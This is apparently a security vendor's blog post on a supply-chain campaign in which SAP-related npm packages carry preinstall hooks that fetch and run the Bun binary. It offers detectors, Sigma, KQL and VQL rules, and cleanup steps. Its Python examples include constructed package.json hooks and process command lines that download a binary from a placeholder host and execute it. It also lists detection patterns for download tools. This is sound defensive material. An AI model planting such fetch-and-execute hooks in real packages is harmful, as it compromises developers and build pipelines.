
Mini Shai-Hulud: Detecting SAP NPM Supply Chain Attack and Bun Binary Abuse

Security Arsenal Team
April 30, 2026
5 min read

The open-source ecosystem faces a persistent threat from supply chain compromises, and the recent "Mini Shai-Hulud" campaign targeting SAP NPM packages is a stark reminder. The attackers weaponized the trust placed in SAP-related packages by injecting malicious preinstall hooks into them. These hooks fetch and execute the Bun binary, a JavaScript toolkit and runtime, to slip past conventional security monitoring and establish a foothold.

For defenders this is not a patch-management issue but an active intrusion scenario: a developer or build agent that runs npm install and pulls one of these packages executes the malware. The use of the Bun runtime is a deliberate evasion technique: it blends in with legitimate development tooling while running unauthorized shell commands. Immediate action is required to identify compromised build pipelines and developer workstations.

Technical Analysis

Affected Products and Platforms:

  • Platform: Node.js environments utilizing NPM (Node Package Manager).
  • Targeted Packages: Various packages masquerading as or related to SAP libraries (specific package names are being tracked via industry intelligence feeds, but the TTP is broad).
  • Operating Systems: Cross-platform (Windows, Linux, macOS) where NPM is installed.

Attack Mechanism:

  1. Initial Vector: A developer or CI/CD pipeline executes npm install on a project that depends on a compromised package.
  2. Execution: The package's package.json contains a malicious preinstall script. npm runs it automatically, without prompting, before the package is installed, and it runs with the full privileges of the user or build agent.
  3. Payload Delivery: The preinstall script uses a native tool already on the host (curl or wget on Linux/macOS, PowerShell on Windows) to download a bun binary from an external attacker-controlled URL.
  4. Execution & Evasion: The script executes the downloaded bun binary. Bun is then used to run shell commands or scripts, potentially establishing a reverse shell or downloading additional payloads. Because Bun is a legitimate (though less common) tool, its execution may fly under the radar of EDR rules tuned strictly for node, python, or powershell.
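To make the hook concrete, here is an added Python example (it is not code from this post or from the campaign itself) that triages the lifecycle hooks in a package.json. The two malicious package.json documents inside it are constructed to mirror the mechanism above, with a placeholder download host (cdn.example.invalid); the benign one shows ordinary hooks that must not fire. It goes slightly beyond the text by checking install, postinstall and prepare as well as preinstall, since npm runs all of them during installation.

```python
import json
import re
from pathlib import Path

# Hooks npm runs with no prompt while installing a dependency.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# The hook fetches something from the network ...
FETCH_RE = re.compile(
    r"\b(curl|wget|invoke-webrequest|iwr|downloadfile|downloadstring)\b|https?://",
    re.I,
)
# ... and executes a dropped runtime. "bun" must stand alone (preceded by a
# separator or path character, followed by whitespace or end of string) so
# that words such as "bundle" do not match.
EXEC_RE = re.compile(
    r"(?:^|[\s;&|/\\])bun(?:\.exe)?(?=\s|$)|chmod\s+\+x|\b(?:sh|bash)\s+-c\b",
    re.I,
)


def triage_hooks(package_json_text):
    """Return [(hook, command, verdict)] for each lifecycle hook present.

    verdict is "high" when the hook both fetches from the network and runs a
    dropped binary, "review" when only one of the two is seen, "ok" otherwise.
    """
    try:
        doc = json.loads(package_json_text)
    except json.JSONDecodeError:
        return [("(unparseable)", "", "review")]
    scripts = doc.get("scripts") if isinstance(doc, dict) else None
    if not isinstance(scripts, dict):
        return []
    results = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        fetch = bool(FETCH_RE.search(cmd))
        run = bool(EXEC_RE.search(cmd))
        verdict = "high" if fetch and run else "review" if fetch or run else "ok"
        results.append((hook, cmd, verdict))
    return results


def scan_tree(root):
    """Walk a project tree, node_modules included, and return every hook that
    is not plainly ok as (path, hook, command, verdict)."""
    hits = []
    for path in Path(root).rglob("package.json"):
        text = path.read_text(encoding="utf-8", errors="replace")
        for hook, cmd, verdict in triage_hooks(text):
            if verdict != "ok":
                hits.append((str(path), hook, cmd, verdict))
    return hits


# Constructed samples; the download host is a placeholder, not a real IOC.
MALICIOUS_LINUX = json.dumps({
    "name": "example-dep", "version": "1.0.1",
    "scripts": {
        "preinstall": "curl -fsSL https://cdn.example.invalid/bun -o /tmp/bun "
                      "&& chmod +x /tmp/bun && /tmp/bun run setup.js",
    },
})
MALICIOUS_WINDOWS = json.dumps({
    "name": "example-dep", "version": "1.0.2",
    "scripts": {
        "preinstall": 'powershell -NoProfile -Command "Invoke-WebRequest '
                      'https://cdn.example.invalid/bun.exe -OutFile $env:TEMP\\bun.exe; '
                      '& $env:TEMP\\bun.exe run setup.js"',
    },
})
BENIGN = json.dumps({
    "name": "example-native", "version": "2.3.0",
    "scripts": {
        "preinstall": "node scripts/check-node-version.js",
        "postinstall": "node-gyp rebuild",
        "prepare": "husky install",
        "test": "jest",
    },
})
TELEMETRY_ONLY = json.dumps({
    "name": "example-telemetry", "version": "0.9.0",
    "scripts": {"postinstall": "curl -s https://stats.example.invalid/ping"},
})

if __name__ == "__main__":
    for label, text in [("linux", MALICIOUS_LINUX), ("windows", MALICIOUS_WINDOWS),
                        ("benign", BENIGN), ("telemetry", TELEMETRY_ONLY)]:
        print(label, triage_hooks(text))
```

Run scan_tree(".") from a project root to cover the installed dependency tree; "review" hits (network fetch without execution, or execution without a fetch) are worth a look but are common in legitimate native-module and telemetry packages.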

Exploitation Status:

  • Status: Confirmed active exploitation in the wild.
  • Nature: Supply chain compromise (malicious package publication).

Detection & Response

Sigma Rules

---
title: Suspicious Bun Binary Execution via NPM
id: 8a4d9b12-3e5c-4f1a-a9b8-7c6d5e4f3a21
status: experimental
description: >
  Detects the Bun runtime being launched from an npm lifecycle script, indicative of the
  Mini Shai-Hulud supply chain attack. npm runs lifecycle scripts through cmd.exe on Windows
  (sh on Linux/macOS), so the direct parent of bun is usually that shell, or PowerShell when
  the hook uses it to download the binary; node.exe is the grandparent, not the parent.
references:
  - https://www.securityweek.com/sap-npm-packages-targeted-in-supply-chain-attack/
author: Security Arsenal
date: 2026-04-06
tags:
  - attack.execution
  - attack.t1204
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\node.exe'
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_child:
    Image|endswith: '\bun.exe'
  condition: all of selection_*
falsepositives:
  - Legitimate use of Bun by developers (rare in enterprise); baseline known Bun users before alerting
level: high
---
title: NPM Preinstall Hook Spawning Network Tools
id: 9b5e0c23-4f6d-4a2b-b0c9-8d7e6f5a4b32
status: experimental
description: >
  Detects download tools (curl, wget, PowerShell web cmdlets) launched from an npm lifecycle
  script, the pattern malicious preinstall hooks use to fetch the Bun binary. The cmd.exe
  parent is constrained to the "/d /s /c" invocation that node and npm use to run a script,
  which excludes interactive consoles.
references:
  - https://www.securityweek.com/sap-npm-packages-targeted-in-supply-chain-attack/
author: Security Arsenal
date: 2026-04-06
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent_node:
    ParentImage|endswith: '\node.exe'
  selection_parent_shell:
    ParentImage|endswith: '\cmd.exe'
    ParentCommandLine|contains: '/d /s /c'
  selection_native:
    Image|endswith:
      - '\curl.exe'
      - '\wget.exe'
  selection_ps_image:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_ps_cli:
    CommandLine|contains:
      - 'invoke-webrequest'
      - 'iwr '
      - 'downloadfile'
      - 'downloadstring'
  condition: 1 of selection_parent_* and (selection_native or (selection_ps_image and selection_ps_cli))
falsepositives:
  - Legitimate build scripts fetching resources; tune on ParentCommandLine or project path once the noisy packages are known
level: medium
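The parent/child logic behind these rules, as an added Python example that is not part of the original rules or page. The process-creation events are constructed: a Windows chain node.exe to cmd.exe to powershell.exe to bun.exe, a hand-typed curl outside npm, and the equivalent Linux chain through sh. The point it shows is that npm launches lifecycle scripts through a shell, so a check on the direct parent alone misses the hop, while a short walk over the ancestor chain catches both the download tool and the dropped binary.

```python
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation event (Sysmon EID 1 / DeviceProcessEvents style)."""
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


NODE = {"node.exe", "node"}
SHELLS = {"cmd.exe", "sh", "bash", "dash"}          # what npm uses to run scripts
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"curl.exe", "wget.exe", "curl", "wget"}
BUN = {"bun.exe", "bun"}
PS_DOWNLOAD_TOKENS = ("invoke-webrequest", "iwr ", "downloadfile", "downloadstring")


def basename(image):
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def lineage(events, pid, max_depth=5):
    """[self, parent, grandparent, ...] as lower-case basenames."""
    by_pid = {e.pid: e for e in events}
    chain, cur = [], by_pid.get(pid)
    while cur is not None and len(chain) < max_depth:
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def parent_is_node(chain):
    """The naive check: only the direct parent is inspected."""
    return len(chain) > 1 and chain[1] in NODE


def under_npm_script(chain):
    """True when node is an ancestor within three hops and everything in
    between is a shell or PowerShell, which is how npm launches hooks."""
    for ancestor in chain[1:4]:
        if ancestor in NODE:
            return True
        if ancestor not in SHELLS | POWERSHELL:
            return False
    return False


def classify(events):
    """Return [(pid, rule title)] for events matching either Sigma rule."""
    alerts = []
    for e in events:
        chain = lineage(events, e.pid)
        if not under_npm_script(chain):
            continue
        name = chain[0]
        if name in BUN:
            alerts.append((e.pid, "Suspicious Bun Binary Execution via NPM"))
        elif name in DOWNLOADERS or (
            name in POWERSHELL
            and any(t in e.cmdline.lower() for t in PS_DOWNLOAD_TOKENS)
        ):
            alerts.append((e.pid, "NPM Preinstall Hook Spawning Network Tools"))
    return alerts


# Constructed events; paths and the download host are placeholders.
EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # npm install on a Windows workstation: node runs npm-cli.js, the hook is
    # handed to cmd.exe /d /s /c, which calls PowerShell to fetch and run bun.
    ProcEvent(200, 100, r"C:\Program Files\nodejs\node.exe",
              r'node "C:\Program Files\nodejs\node_modules\npm\bin\npm-cli.js" install'),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /d /s /c "powershell -NoProfile -Command Invoke-WebRequest'
              r' https://cdn.example.invalid/bun.exe -OutFile C:\Temp\bun.exe; & C:\Temp\bun.exe run setup.js"'),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -NoProfile -Command Invoke-WebRequest https://cdn.example.invalid/bun.exe"
              r" -OutFile C:\Temp\bun.exe; & C:\Temp\bun.exe run setup.js"),
    ProcEvent(500, 400, r"C:\Temp\bun.exe", r"C:\Temp\bun.exe run setup.js"),
    # A developer running curl by hand from a console: not under node.
    ProcEvent(600, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(700, 600, r"C:\Windows\System32\curl.exe", "curl https://registry.npmjs.org/"),
    # Same chain on a Linux build agent (npm uses sh -c there).
    ProcEvent(800, 1, "/usr/bin/node", "node /usr/lib/node_modules/npm/bin/npm-cli.js ci"),
    ProcEvent(900, 800, "/bin/sh",
              'sh -c "curl -fsSL https://cdn.example.invalid/bun -o /tmp/bun && /tmp/bun run setup.js"'),
    ProcEvent(1000, 900, "/usr/bin/curl", "curl -fsSL https://cdn.example.invalid/bun -o /tmp/bun"),
    ProcEvent(1100, 900, "/tmp/bun", "/tmp/bun run setup.js"),
]

if __name__ == "__main__":
    for pid, rule in classify(EVENTS):
        print(pid, lineage(EVENTS, pid), rule)
```

Sysmon and Defender only expose parent (and, in DeviceProcessEvents, grandparent) fields, which is why the Sigma rules above list the shells as parents instead of node; the ancestor walk here is what you would do with a full process tree from an EDR or a Velociraptor pslist() snapshot.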

KQL (Microsoft Sentinel / Defender)

// Hunt for Bun execution, or for download tools launched from an npm lifecycle script.
// npm runs scripts through a shell (cmd.exe on Windows, sh on Linux/macOS), so the
// download tool's parent is usually that shell and node is the grandparent.
// DeviceProcessEvents names the new process FileName, not ProcessName.
DeviceProcessEvents
| where Timestamp > ago(7d)
| extend ParentIsNode = InitiatingProcessFileName in~ ("node.exe", "node"),
         ShellUnderNode = InitiatingProcessFileName in~ ("cmd.exe", "sh", "bash", "dash")
                          and InitiatingProcessParentFileName in~ ("node.exe", "node")
| where FileName in~ ("bun.exe", "bun")
    or ((ParentIsNode or ShellUnderNode)
        and (FileName in~ ("curl.exe", "wget.exe", "curl", "wget", "powershell.exe", "pwsh.exe")
             or ProcessCommandLine has_any ("Invoke-WebRequest", "DownloadFile", "DownloadString", "curl", "wget")))
| extend HostName = DeviceName, Account = AccountName
| project Timestamp, HostName, Account, FileName, FolderPath, ProcessCommandLine,
          InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
| order by Timestamp desc

Velociraptor VQL

-- Hunt for running Bun processes. The regexes are anchored so that names such as
-- "bundle" or "ubuntu" do not match; Ppid lets you pivot to the parent shell/node.
SELECT Pid, Ppid, Name, Exe, CommandLine, StartTime
FROM pslist()
WHERE Name =~ "^bun([.]exe)?$"
   OR basename(path=Exe) =~ "^bun([.]exe)?$"

-- Search package.json files under a chosen root for a preinstall hook that
-- references bun or fetches over the network. Point RootDir at developer homes or
-- the build workspace; globbing the whole disk is slow.
LET RootDir = "/home"
SELECT OSPath, Mtime, Size,
       parse_json(data=read_file(filename=OSPath)).scripts.preinstall AS Preinstall
FROM glob(globs="**/package.json", root=RootDir)
WHERE read_file(filename=OSPath) =~ "preinstall"
  AND read_file(filename=OSPath) =~ "bun|https?://|curl|wget"

Remediation Script (Bash)

#!/bin/bash
# Check package.json files (including installed dependencies under node_modules)
# for a 'preinstall' hook that fetches something over the network or runs bun.
# Only the hook text itself is inspected, so "homepage"/"repository" URLs
# elsewhere in the file do not produce false positives.
set -u

command -v jq >/dev/null 2>&1 || { echo "jq is required" >&2; exit 2; }

echo "Scanning for suspicious package.json files..."

find . -name 'package.json' -type f -exec sh -c '
  for file; do
    # -r prints the raw string; "// empty" prints nothing when the hook is absent
    hook=$(jq -r ".scripts.preinstall // empty" "$file" 2>/dev/null) || continue
    [ -n "$hook" ] || continue
    # "bun" must stand alone so that e.g. "bundle" does not match
    if printf "%s" "$hook" | grep -Eqi "(^|[^[:alnum:]_-])bun([.]exe)?($|[^[:alnum:]_-])|https?://|curl|wget|invoke-webrequest"; then
      echo "[!] Suspicious preinstall hook found in: $file"
      echo "    $hook"
    fi
  done
' sh {} +

echo "Scan complete. Please review the output above."
echo "If malicious packages are found, delete node_modules and reinstall from trusted sources."

Remediation

  1. Identify and Isolate: Immediate isolation of developer workstations or build agents identified in the detection phase.

  2. Package Audit: Review your package-lock.json or yarn.lock files against the list of compromised SAP-related packages published in industry advisories (e.g., ReversingLabs, Sonatype). Check the lockfile rather than package.json alone, since the malicious version may have been pulled in as a transitive dependency.

  3. Cleanup:

    • Delete the node_modules directory of affected projects.
    • Remove the specific malicious version from package.json and the lockfile.
    • Update to the latest, verified safe version of the package.
    • Clear any NPM cache: npm cache clean --force.
  4. Blocking: Implement Application Control (e.g., AppLocker, Windows Defender Application Control) policies to block the execution of unauthorized bun binaries unless explicitly approved by the engineering team.

  5. CI/CD Hardening: Run CI/CD pipelines with the minimum credentials they need (read-only registry tokens where possible) and do not let dependency installs run arbitrary lifecycle scripts: use npm ci --ignore-scripts, or set ignore-scripts=true in the project .npmrc. Some native packages rely on install scripts, so test the build with scripts disabled and re-enable them only for the specific packages that need them.
